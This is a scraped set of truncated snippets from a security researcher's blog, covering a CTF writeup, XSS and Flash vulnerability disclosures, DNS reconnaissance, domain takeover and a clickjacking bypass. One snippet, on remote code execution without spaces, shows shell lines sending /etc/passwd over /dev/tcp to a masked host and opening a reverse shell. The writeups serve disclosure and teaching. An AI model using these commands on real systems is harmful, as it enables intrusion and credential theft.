zoczus.blogspot.com
ZoczuS Blog: [PL] Bypassing Same-Origin Policy - slajdy z 4Developers 2015
http://zoczus.blogspot.com/2015/04/pl-bypassing-same-origin-policy-slajdy.html
Środa, 22 kwietnia 2015. PL] Bypassing Same-Origin Policy - slajdy z 4Developers 2015. W poniedziałek 20.04.2015r. miałem przyjemność bycia prelegentem na konferencji 4Developers. W ścieżce Security organizowanej przez SecuRing. Slajdy z prezentacji: https:/ drive.google.com/file/d/0B7U6Q1zbqTkyOEY3TmRXWl8tODQ/view? Nagranie będzie dostępne w przyszłości. :). Udostępnij w usłudze Twitter. Udostępnij w usłudze Facebook. Udostępnij w serwisie Pinterest. Subskrybuj: Komentarze do posta (Atom).
zoczus.blogspot.com
ZoczuS Blog: CSAW CTF Web300 writeup
http://zoczus.blogspot.com/2014/09/csaw-ctf-web300-writeup.html
Niedziela, 21 września 2014. CSAW CTF Web300 writeup. In this post I want to show my solution for CSAW CTF. Web300. This is the service, where we are able to post some links, that are parsed by bot, and looks like this:. There are two important things about this task. First of all, we can notice that page using jquery 1.6.1 (which prone to XSS - CVE-2011-4969. And serving this kind of code:. Pretty simple. doesn't it? Udostępnij w usłudze Twitter. Udostępnij w usłudze Facebook. CSAW CTF Web300 writeup.
zoczus.blogspot.com
ZoczuS Blog: kwietnia 2013
http://zoczus.blogspot.com/2013_04_01_archive.html
Środa, 10 kwietnia 2013. EN] DNS missing allow-transfer. Ten Post wyjątkowo będzie napisany w języku angielskim. Z góry przepraszam. :-). Before we start pentesting it's always good to gather some information about our target. One thing which we'd like to know are additional resources - SQL servers, developers and test machines, backups, etc. For example, we can check PTR records (revDNS) for IP class (manually or using this tool. Sometimes, our target configures his zone without allow-transfer. Awk -F: ...
zoczus.blogspot.com
ZoczuS Blog: lutego 2015
http://zoczus.blogspot.com/2015_02_01_archive.html
Wtorek, 3 lutego 2015. Evercookie.swf - Stored Cross-Site Scripting. Released new version of evercookie. That fixes Stored Cross-Site Scripting issue that I reported. Here is how it works in details. First of all - we should check vulnerable code: evercookie.as. So - the flash file takes flashVar parameter everdata. And puts it to SharedObject. Something like Local Storege but for Flash). If some data already was in SharedObject - it pass its value to javascript function called evercookie flash var().
zoczus.blogspot.com
ZoczuS Blog: października 2013
http://zoczus.blogspot.com/2013_10_01_archive.html
Czwartek, 10 października 2013. EN] Unix RCE without spaces. You have Remote Code Execution bug - but spaces are removed. How to pass parameters in this case? And what if we can't see the result of executed command? Let's do small trick - redirecting default input / output. Zoczus@hell: $ cat /etc/debian version 7.1. Can't see the output? Send it through Internet! Zoczus@hell: $ cat /etc/passwd /dev/tcp/xxxx.pl/5060. It looks all right ;) You can also create reverse shell:. Sh /dev/tcp/ xxxx.pl/5060.
zoczus.blogspot.com
ZoczuS Blog: kwietnia 2015
http://zoczus.blogspot.com/2015_04_01_archive.html
Środa, 22 kwietnia 2015. PL] Bypassing Same-Origin Policy - slajdy z 4Developers 2015. W poniedziałek 20.04.2015r. miałem przyjemność bycia prelegentem na konferencji 4Developers. W ścieżce Security organizowanej przez SecuRing. Slajdy z prezentacji: https:/ drive.google.com/file/d/0B7U6Q1zbqTkyOEY3TmRXWl8tODQ/view? Nagranie będzie dostępne w przyszłości. :). Udostępnij w usłudze Twitter. Udostępnij w usłudze Facebook. Udostępnij w serwisie Pinterest. So we can manipulate with target. 3 The second's tab ...
zoczus.blogspot.com
ZoczuS Blog: marca 2014
http://zoczus.blogspot.com/2014_03_01_archive.html
Sobota, 1 marca 2014. Analysis of swfupload CVE-2013-2205 Security.allowDomain('*') flaw. Yes - I know it's the old one. As far as I've got lots of stuff to do, I had small amount of time to take a closer look to this vulnerability, found by Szymon Gruszecki. And identified by CVE-2013-2205. At first, please take a look to secure. For this vuln. Yes - it's just one removed line. :). It will be short - for details please visit Adobe documentation. UploadSuccess() is called after successful upload (wow)...
zoczus.blogspot.com
ZoczuS Blog: GetClouder domain takeover
http://zoczus.blogspot.com/2014/09/getclouder-domain-takeover.html
Piątek, 5 września 2014. Is cloud hosting service having bug bounty program. In Administration Panel we have some domain management tool for hosting our own domain names. After adding ANY domain - zone is configured on two DNS servers: nimbus.getclouder.com. And cumulus.getclouder.com. Even if we are not owner of the domain. If you get NS records for getclouder.com. Domain, you'll see that it's hosted on same servers:. Zoczus@hell: $ host -t ns getclouder.com. And ns2.clev1.net. Wowns1.clev1.net ...Zoczu...
zoczus.blogspot.com
ZoczuS Blog: czerwca 2013
http://zoczus.blogspot.com/2013_06_01_archive.html
Niedziela, 23 czerwca 2013. Winiary Pomysł Na. - ominięcie Frame-Busting. Na pewno mieliście okazję spotkać się ze zjawiskiem takim jak Clickjacking. Obecnie chyba jedyną skuteczną metodą na zabezpieczenie przed tego typu atakami jest wysłanie nagłówka X-Frame-Options. Dzięki któremu mamy możliwość kontrolować czy strona ma być załadowana w ramce czy nie. Innym spotykanym zabezpieczeniem jest tzw. Frame Busting. 1 Nie stosuje X-Frame-Options. 2 Używa Frame Bustingu:. Z pomocą przyjdzie nam atrybut sandbox.
zoczus.blogspot.com
ZoczuS Blog: stycznia 2015
http://zoczus.blogspot.com/2015_01_01_archive.html
Środa, 7 stycznia 2015. Yammer.com - Same Origin Method Execution. SOME ;-) time ago @BenHayak. Talked about Same-Origin Method Execution. On BlackHat EU. At the time of posting this article, there's no public whitepaper yet (only leaked slides) - that's why I'd love to share one of first posts that show this attack in action. Is part of Microsoft Bug Bounty for Online Services. During some research in used Flash files I found this one: video-js.swf. Take a look to this piece of code:. 3 We’re redi...
SOCIAL ENGAGEMENT